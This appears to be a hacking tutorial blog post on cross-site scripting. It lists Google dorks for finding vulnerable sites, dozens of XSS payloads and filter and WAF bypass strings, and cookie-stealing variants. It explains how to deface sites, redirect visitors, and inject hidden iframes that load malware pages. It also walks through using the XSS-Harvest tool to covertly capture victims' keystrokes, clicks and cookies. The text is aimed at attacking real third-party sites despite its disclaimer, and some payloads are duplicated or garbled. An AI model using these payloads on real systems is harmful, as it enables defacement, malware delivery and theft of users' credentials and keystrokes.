NOTE: Hacking
is a illegal activity so don't try on anyone. this tutorial is Only for
educational purpose. If you want to use
this tutorial for miscellaneous purpose please stop reading.
XSS Cross Site Scripting
There are actually three types of Cross-Site Scripting, commonly
named as:
1. DOM-Based XSS
2. Non-persistent XSS
3. Persistent XSS
How to Find XSS Vulnerabilities:-
To start
finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes,
Search Box's, there are too many to
mention.
Using
'Google Dorks' to make the finding easyier, Ok if you wanna get cracking, go to
google.com and type inurl:"search.php?q=" now that is a common page and has a lot of results.
Also note that most sites have XSS Vulnerabilities, its just having a good eye,
and some good knowledge on how to bypass there filteration.
Basics of XSS:
Well
now lets start learning some Actual Methods, the most common used XSS injection
is :
(Just type)
<script>alert("DEV_D
")</script>
now this will alert a popup message, saying " DEV_D " without quotes. So,use "search.php?q=" and you can simple try the following on a website
with the same thing,
http://website.com/search.php?q=<script>alert("DEV_D
")</script>
There
are good chances of it working, but dont be worried if it dont, just try
diffrent sites. You can insert HTML not just javascript :
http://website.com/search.php?q=<br><br><b><u>DEV_D</u></b>
if you see the bold text on the page and newlines then you knows its vulnerable.
if you see the bold text on the page and newlines then you knows its vulnerable.
Deface a Website using XSS ?
The first one being IMG SCR, now for those of
you who dont know html, IMGSCR is a tag, that displays the IMAGE linked to it
on the webpage.
<html><body><IMGSRC="http://website.com/yourDefaceIMAGE.png"></body></html>
ok now if you change the link to a valid
picture link, and save it and run it you will see what i mean. Right now say
you have found a Shoutbox, Comment box, or
anything that shows your data after you submitted it you could insert the
following to make the picture display on the page.
<IMGSRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed has the page will already have them. Ok it helps to make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
<IMGSRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed has the page will already have them. Ok it helps to make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED
SRC="http://site.com/xss.swf"
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.dev.com/" )</script>
There are many others ways that you can found using Google or other website.
Mine purpose is to make you understand the concept :)
How to Bypass Filtration ?
A lot of
sites may seem vulnerable but not executing the code, well to solve this read
this. Some
common methods to bypass filtration is
')alert('xss');
or
");alert('xss');
that will do
the same thing has <script>alert("XSS")</script> on a vulnerable server.You can also
try hexing or base64 encoding your data before you submit, Please note its bad
practice to use alert("XSS") to test for XSS, because some sites
block the keyword "XSS" before
so we using “DEV_D”.
Some other
ways to bypass filtration
website.com/search.php?q="><script>alert(“DEV_D”)</script>
website.com/search.php?q="><script>alert(“DEV_D”)</script>
website.com/search.php?q="><script>alert(“DEV_D”);</script>
website.com/search.php?q="><script>alert(/DEV_D");</script>
website.com/search.php?q=//"><script>alert(/DEV_D/);</script>
website.com/search.php?q=xyz<script>alert(/DEV_D/);</script>
website.com/search.php?q=xyz"><script>alert(/DEV_D/);</script>
website.com/search.php?q=xyz"></script><script>alert(/DEV_D/);</script>
website.com/search.php?q=000"><script></script><script>alert(DEV_D);</script>
website.com/search.php?q=000xyz</script><script>alert(/DEV_D/);</script>
website.com/search.php?q=--<script>"></script>alert(/DEV_D/);</script>
website.com/search.php?q="><img
src='javascript:alert('DEV_D);'>
website.com/search.php?q="><script
src='http://virus.js'</script>
Advanced XSS - way to bypass magic
quotes filtration:
Ok now we
are going to learn about some good techniqes. I have came across many sites where
'Magic Quotes' is on and therfore rendering some commands useless. Fear not, i
have come up with a way using char codes (Decimals), to convert char code to
Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a
complete table here
http://www.asciitable.com/
http://easycalculation.com/
This will
help you write what you want, In my examples ill be writing "HOC"
this is the following code
72
79 67
Ok now we
got the Decimal value of our string, we need to know what function in
javascript converts this.
String.fromCharCode()
is suitable
for this kinda things, its easy to setup, im gona give it my args below.
String.fromCharCode(72, 79, 67)
Ok now "String.fromCharCode(72,
79, 67)" Is a JAVA (ASCII) way
of saying "HOC". And to use
this with alerts etc, you dont need to use quotes, as it acts as a variable.
<script>alert(String.fromCharCode(72,79,67))</script>
New XSS
Payloads
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<basehref="javascript:\"><ahref="//%0aalert(/1/);//">link</a>
javascript:/*--
></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Nice CSP & WAF Bypass <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==
"http-equiv=refresh>
<svg </onload ="1>
(_=alert,_(DEV)) "">
<img onerror=alert(1) src
<u></u>
Advance Scripts To Find XSS Vulnerabilities In Websites. Just Copy any script and try ..
To Redirect exploit code:';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
Now for XSS
Example: www. xyz.com?q=" XSS Script"
• "/>alert("Xss:DEV_D")
• "/></script><script>alert(/XSS
: DEV_D/)</script>
<body onload=alert(1)>
"<body onload="alert('XSS by DEV_D)">
"><%2Fstyle<%2Fscript><script>confirm("XSS
By DEV_D")<%2Fscript>
<body
onload=document.getElementById("xsrf").submit()>
<a
href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<ahref="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
•http://test.com<script>alert(document.domain)</script>
•http://test.com<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.domain)>
x"></script><img src=x onerror=alert(1)>
q=" onclick="alert(/XSS/)
"><iframe src='javascript:prompt(/XSS/);'>
<iframe src="http://google.com"></iframe>
"><iframe src=a onload=alert('XSS')<
</script><script>alert(document.cookie)</script>
<xss>alert('xss')</xss>
<iframe src="http://google.com"></iframe>
DOM Based XSS Scripts
/default.aspx#"><img
src=x onerror=prompt('XSS');>
/default.aspx#"><img
src=x onerror=prompt('0');>
<img src=x onerror=prompt(1);> by ">
“><img src=x onerror=prompt(0)>.txt.jpg
“><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(1);>
"><script>alert('XSS')</script>
id=abc"><Script>alert(/xss/)</SCRIPT>
"><img src=" " onMouseover=prompt(/xss/);>
Default.aspx/" onmouseout="confirm(1)'x="
Script for changing the background Color of a
website:
<script>document.body.bgColor="red";</script>
use this in your target website as
http://www.targetwebsite.com/<script>document.body.bgColor="red";</script>
Script
for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg/";</script>
Defacement Page with Pastehtml:
First of all upload some
defacement page(html) to pastehtml.com and get the link. When you find a XSS
vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the
page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
Defacing with iframe Injection
What is an IFrame
Injection?
Using
IFrame tag, The Attackers injects the malware contain website(links) using
Cross site Scripting in popular websites. So if the usual visitors of that
popular sites opens the website, it will redirect to malware contain website.
Malware will be loaded to your computer, now you are infected .
What an attacker can
do with Iframe Injection?
Using
Iframe Injection, an attacker can inject advertisements inside any other websites,
insert malware infected site links, redirect to malware infected sites and
more.
Iframe Injection
Tutorial:
1.First
of all attacker will find the Vulnerable websites using google dorks.
2.
They test the vulnerability by inserting some iframe tag using the url.
3.
then insert the Malicious Iframe code inside the webpage.
For
Example: he can insert this code using the url:
Code:
<iframesrc=”http://malwarewebpages/web.html”width=1height=1style=”visibility:hidden;position:absolute”></iframe>
For php webpages:
echo“<iframesrc=\”http://malwarewebpages/web.html\”width=1height=1style=\”visibility:hidden;position:absolute\”></iframe>”;
I have just given some easy
method only to deface the XSS affected page ..
XSS-Harvest:-
Harvesting
Cross Site Scripting, Clicks, Keystrokes and Cookies
Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.
Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.
Functionality
of xss-harvest:
* Infection
script adds relevant event listeners (keystrokes, onload() and mouse clicks) to
the vulnerable page and sets up communication with the XSS-Harvest server.
* Any key
entered will be sent covertly to the server.
* Any mouse
click performed will be analysed and the data covertly sent to the server.
* Optionally
‘redress’ the vulnerable page to display a different page on the same subdomain
– e.g. a login form.
* If
redressing the victim’s browser, allow subsequently loaded pages to be also
‘infected’ – assuming they don’t break the same-origin policy (i.e. they’re on
the same subdomain).
* Keeps
track of victims for the lifetime of the XSS-Harvest cookie (future visits are
recognised as a returning victim).
* Each
victim has a separate history file containing all events, cookies and
keystrokes.
* Server
console displays real time data received (due to multi-threaded nature,
keystrokes are displayed as ‘.’ characters to avoid confusion).
* Tested in
IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS
only in most cases), FF5, Chrome and various mobile browsers (Safari and
Android). Please let me know your success with other browsers.
* Overcomes
browser oddities, such as Internet Explorer throttling requests to the same URL
when exfiltrating keystrokes.
How to Exploit XSS with
XSS-Harvest?
Identify a
page vulnerable to XSS (reflected or persistent will be fine – unless the
victim is running IE9 or another plugin such as NoScript).
Understand
the markup of the page. You should be looking to insert syntactically correct <script></script> tags in to the source
of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage
to ensure the page is actually vulnerable.
Start the
XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user
on a port > 1024 using the -p option. To start the server you must instruct
it to listen with the -l option.
Insert the
following ‘injection string’ into the vulnerable page:
<script
src=”>
This will
return the client-side JavaScript to the victim, indicated by the ‘i’ in the
URL.
Entice
visitors to the infected page (or to follow a link in the case of reflected
XSS).
Watch your
victims roll in – a new history file will be created for each new victim.
To use of
the redress function, start the server with the -r parameter:
./xss-harvest.pl-l-rhttp://vulnerablepage.local/login.html
Basic dependencies:
HTTP::Server::Simple::CGI,
Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork
Legal Disclaimer : This
tutorial is completely for educational purpose only. For any misuse of this
tutorial by any means the author will not be held responsible.
0 Comments